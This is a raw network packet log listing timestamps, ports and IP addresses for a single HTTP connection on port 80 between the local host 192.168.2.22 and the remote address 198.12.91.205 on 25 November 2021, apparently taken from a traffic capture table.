Nov 25, 2021 19:05:28.211671114 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211684942 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211687088 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211704016 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211714983 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211719036 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211734056 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211744070 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211754084 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.211779118 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.211807966 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.215536118 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326247931 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326282978 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326301098 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326317072 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326334000 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326353073 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326374054 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326395988 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326416969 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326431990 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326438904 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326457977 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326466084 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326473951 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326491117 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326499939 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326513052 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326534986 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326535940 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326554060 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326565981 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326570988 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326587915 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326596022 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326605082 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326621056 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326631069 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326637983 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326656103 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326659918 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326678991 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326697111 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326700926 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326713085 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326730013 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326733112 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326746941 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326762915 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326766014 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326780081 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326797962 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.326798916 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326833963 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.326864004 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.329948902 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.329986095 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330005884 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330029964 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330054045 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330079079 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330080986 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330101967 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330106020 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330126047 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330138922 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330149889 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330168962 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330172062 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330199003 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330204010 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330226898 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330234051 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330250978 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330255032 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330267906 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330284119 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330287933 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330300093 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330317974 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330321074 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330332994 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.330353975 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330380917 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.330863953 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.441526890 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441561937 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441585064 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441611052 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441628933 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441653013 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441677094 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441699982 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.441715956 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.441751003 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.441755056 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445688009 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445720911 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445744038 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445765972 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445791960 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445812941 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445816040 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445838928 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445844889 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445848942 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445861101 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445874929 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445879936 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445883989 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445894957 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445909023 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445920944 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445933104 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445941925 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445956945 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445967913 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.445977926 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.445991039 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446001053 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446022987 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446024895 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446041107 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446052074 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446064949 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446086884 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446105003 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446126938 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446151972 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446158886 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446176052 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446187019 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446192026 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446194887 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446197987 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446198940 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446223021 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446245909 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446284056 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446284056 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446291924 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446295977 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446299076 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446301937 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446307898 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446331978 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446336031 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446356058 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446378946 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446403027 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446403980 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446413040 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446417093 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446425915 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446445942 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446449041 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446456909 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446472883 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446491957 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446510077 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446515083 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446536064 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446558952 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446580887 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446604013 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446626902 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.446655989 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446702003 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446712017 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446716070 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446718931 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.446722984 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.448426008 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.450901985 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556408882 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556447029 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556468010 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556488037 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556512117 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556534052 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556555033 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556576967 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556576967 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556598902 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556615114 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556619883 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556619883 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556622982 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556637049 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556641102 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556658030 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556662083 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556682110 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556732893 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556737900 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556740999 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.556968927 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.556989908 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.557007074 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.557009935 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.557022095 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.557039022 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561240911 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561280966 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561306953 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561331987 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561356068 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561362982 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561382055 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561405897 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561418056 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561427116 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561427116 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561438084 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561451912 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561460972 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561476946 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561487913 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561501980 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561511993 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561523914 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561536074 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561547041 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561547995 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561570883 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561583042 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561594963 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561604977 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561618090 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561629057 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561645031 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561654091 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561667919 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561680079 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561691999 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561702013 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561717033 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561726093 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561741114 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561752081 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561769009 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561779022 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561794043 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561810970 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561817884 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561822891 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561850071 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561856985 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561889887 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561889887 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561916113 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561928034 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561942101 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561952114 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561965942 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.561990976 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.561990976 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562001944 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562016964 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562027931 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562041998 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562053919 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562067986 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562078953 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562092066 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562102079 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562115908 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562129021 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562143087 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562153101 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562167883 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562179089 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562192917 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562202930 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562217951 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562242985 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562246084 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562268019 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562279940 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562283993 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562294006 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562304020 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562319040 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562331915 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562345982 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562355042 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562371969 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562381983 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562397957 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562407017 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562419891 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562442064 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562442064 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562449932 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562467098 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562478065 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562490940 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562504053 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562515020 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562530041 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562537909 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562551022 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562560081 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562582016 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562582970 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562592030 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562608004 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562618971 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562632084 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562645912 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562655926 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562669039 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562681913 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562690973 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562705994 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562727928 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562731028 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562740088 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562752008 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562768936 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562774897 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562807083 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562812090 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562817097 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562832117 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562846899 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562858105 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562874079 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562884092 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562899113 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562907934 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562927961 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562932014 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562951088 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562966108 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562973022 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.562978983 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562993050 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.562997103 CET	80	49165	198.12.91.205	192.168.2.22
